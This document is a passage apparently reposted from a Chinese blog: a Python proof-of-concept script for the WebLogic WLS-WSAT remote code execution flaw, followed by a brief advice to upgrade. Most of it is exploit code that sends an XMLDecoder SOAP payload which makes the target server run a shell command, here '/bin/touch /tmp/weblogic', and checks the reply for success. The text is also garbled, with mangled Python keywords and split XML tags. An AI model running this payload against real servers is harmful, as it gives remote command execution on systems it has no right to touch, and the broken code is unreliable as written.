#!/usr/bin/env python#Coding:utf-8#@Date: 2017/12/22 17:11#@File: weblogic_poc.py#@Author: sevck ([email protected])#@Link: http://www.qingteng.cn#------------------------------------------------------------------------- ImportRequestsImportRe fromSysImportargvheads= { 'user-agent':'mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) gecko/20100101 firefox/56.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-language':'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3', 'Content-type':'Text/xml;charset=utf-8' }defPOC (URL):if notUrl.startswith ("http"): URL="/ http"+URLif "/" inchUrl:url+='/wls-wsat/coordinatorporttype'Post_str=" "<soapenv:envelope xmlns:soapenv= "http://schemas.xmlsoap.org/soap/envelope/" > <soapenv:Header> <work:workcontext xmlns:work= "http://bea.com/2004/06/soap/workarea/" > <java> <objec T class= "Java.lang.ProcessBuilder" > <array class= "java.lang.String" length= "2" > <v OID index= "0" > <string>/bin/touch</string> </void> < void index= "1" > <string>/tmp/weblogic</string> </void> </array> <void method= "Start"/> </object> </java> </wor k:workcontext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>" " Try: Response= Requests.post (URL, data=post_str, Verify=false, timeout=5, headers=heads) Response=Response.text Response= Re.search (r"\<faultstring\>.*\<\/faultstring\>", Response). Group (0)exceptException, E:response="" if '<faultstring>java.lang.processbuilder' inchResponseor "<faultstring>0" inchResponse:result="Vulnerability" returnresultElse: Result="No Vulnerability" returnresultif __name__=='__main__': ifLen (argv) = = 1: Print "python weblogic_poc.py url:port"exit (0)Else: URL= Argv[1] Result= POC (url=URL)PrintResult
Say some fix suggestions:
Personal advice to update the latest version directly, the old version or too many problems. In a chat with Master Liao last night, he was told to submit a WebLogic Rce, who has been given the CVE and is waiting to be released.
Weblogic WLS RCE Vulnerability Verification POC